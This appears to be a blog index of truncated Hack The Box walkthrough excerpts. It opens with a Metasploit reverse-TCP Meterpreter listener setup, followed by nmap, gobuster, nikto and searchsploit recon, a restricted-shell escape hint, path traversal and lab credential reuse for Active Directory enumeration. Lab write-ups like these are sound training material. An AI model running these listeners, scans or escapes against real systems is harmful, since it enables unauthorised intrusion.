Create a Metasploit listener

Steps to create a Metasploit listener: msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost msf5 exploit(multi/handler) > set lport 9999 msf5 exploit(multi/handler) > set ExitOnSession false msf5 exploit(multi/handler) > exploit -j sessions -i 1

(Solution) – Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable

Using Metasploit I’ve sometimes seen this error:  [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: ( To solve it:  List processes listening on port 1234 lsof -i :1234 Kill a process with process ID 5678 kill -9 5678

HTB Devel

 $nmap -T4 -sV -p- -A Open ports detected: 21/tcp open  ftp     Microsoft ftpd 80/tcp open  http    Microsoft IIS httpd 7.5  $nikto -h $nmap -p 80 –script vuln $nmap -p 21 –script vuln  $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt Nothing much useful was found until this point. $ftp ftp> dir ftp> put test.txt ftp> dir So, if we can upload any file, can we

HTB Legacy

$sudo nmap -A -T4 -p- Open ports detected: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Based on the detected ports, we have SMB here. $ msfconsole msf5 > use auxiliary/scanner/smb/smb_version msf5 auxiliary(scanner/smb/smb_version) > options msf5 auxiliary(scanner/smb/smb_version) > run Which smb version do we have? Not sure yet… $nmap -p139 –script smb-protocols -Pn $nmap -p445 –script smb-protocols -Pn According to

HTB Lame

 $nmap -T4 -p- -A -Pn Open ports detected: 21/tcp  open  ftp vsftpd 2.3.4 22/tcp  open  ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 139/tcp  open  netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))  $ftp No files are detected.  $ssh  $msfconsole Install Searchsploit $sudo apt update && sudo apt -y install exploitdb$searchsploit

HTB Starting Point – Base

$./ Ports detected:22/tcp open  ssh  OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open  http Apache httpd 2.4.29 ((Ubuntu)) $gobuster dir -u -w /usr/share/wordlists/dirb/big.txt Interesting items found: /_uploaded and /login Access to The login folder can be listed (Due to a misconfiguration of the webserver) Foothold Download all three files to analyze them. login.php.swp is a binary file. $ls -la $file login.php.swp As it is described, login.php.swp

HTB Starting Point – Guard

$./ Ssh port is open. Let’s try the last ssh user we obtained.   $ssh -i id_rsa daniel@ The SSH login gives us access to a restricted shell, where the commands like find, cat and python are disabled.  We are unable to read user.txt from this shell. Man command can be used to spawn a bash shell. Once the command opens the manual, we can enter the following command to spawn a

HTB Starting Point – Markup

 $./ Open ports: 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) 443/tcp open ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt Apache service is running. Let’s try to access the site. Access to In the previous machine, we found credentials stored in an SQL dump.  Let’s try to reuse them, to log into the application.  The

HTB Starting Point – Included

$./ Open ports detected:80/tcp open  http   Apache httpd 2.4.29 ((Ubuntu)) Access to: redirection to Use Owasp-Zap to scan this site: This machine is vulnerable to a File Inclusion Path Traversal attack. According to the application description: The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a

HTB Starting Point – Pathfinder

 $./ Open ports detected:  WinRM 2.0 (Microsoft Windows Remote Management) uses port 5985/tcp for HTTP and 5986/tcp for HTTPS by default.  Using the credentials we obtained in a previous machine; sandra:Password1234!, we can attempt to enumerate Active Directory. We can achieve this using BloodHound. There is a python bloodhound ingester, which can be found here.  We can attempt to enumerate Active Directory. Try using old machine credentials… BloodHound is a single